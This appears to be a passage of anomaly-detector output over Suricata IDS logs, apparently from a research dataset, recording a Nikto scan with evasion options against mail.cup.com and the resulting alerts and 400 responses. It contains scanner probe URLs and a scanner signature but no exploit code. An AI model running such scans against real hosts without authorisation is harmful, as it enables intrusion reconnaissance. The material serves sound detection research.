"/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46776,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46776, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", 
"/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1625615040672730,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1625615040672730, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.162552+0000\",\"flow_id\":1625615040672730,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46776,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.16 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.164694 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46778 -> 192.168.10.154:80", "/parser/model/time": 1583349514.164694, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 
2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46778, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.164694 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46778 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.16 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.pt-br", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.164854+0000\",\"flow_id\":1725795152854985,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46778,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pt-br\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pt-br\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.164854, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1725795152854985,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46778,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pt-br\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pt-br\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46778,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pt-br\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": 
"\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pt-br\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.pt-br\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.pt-br\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.pt-br", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.pt-br", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", 
"/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46778,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46778, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": 
"TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1725795152854985,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1725795152854985, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.164854+0000\",\"flow_id\":1725795152854985,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46778,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pt-br\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pt-br\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.16 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.166464 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 
192.168.10.238:46780 -> 192.168.10.154:80", "/parser/model/time": 1583349514.166464, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46780, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.166464 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46780 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.iso8859-8", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": 
"{\"timestamp\":\"2020-03-04T19:18:34.166606+0000\",\"flow_id\":392624419276641,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46780,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso8859-8\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso8859-8\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.166606, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":392624419276641,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46780,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso8859-8\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso8859-8\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46780,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso8859-8\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) 
(Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso8859-8\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.iso8859-8\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.iso8859-8\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.iso8859-8", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.iso8859-8", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", 
"/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46780,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": 
",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46780, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":392624419276641,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 392624419276641, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.166606+0000\",\"flow_id\":392624419276641,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46780,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso8859-8\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso8859-8\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", 
"/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.168173 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46782 -> 192.168.10.154:80", "/parser/model/time": 1583349514.168173, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46782, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.168173 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46782 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", 
"/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.types", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.168368+0000\",\"flow_id\":941400980622918,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46782,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.types\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.types\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.168368, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":941400980622918,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46782,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.types\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.types\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46782,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": 
",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.types\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.types\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.types\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, 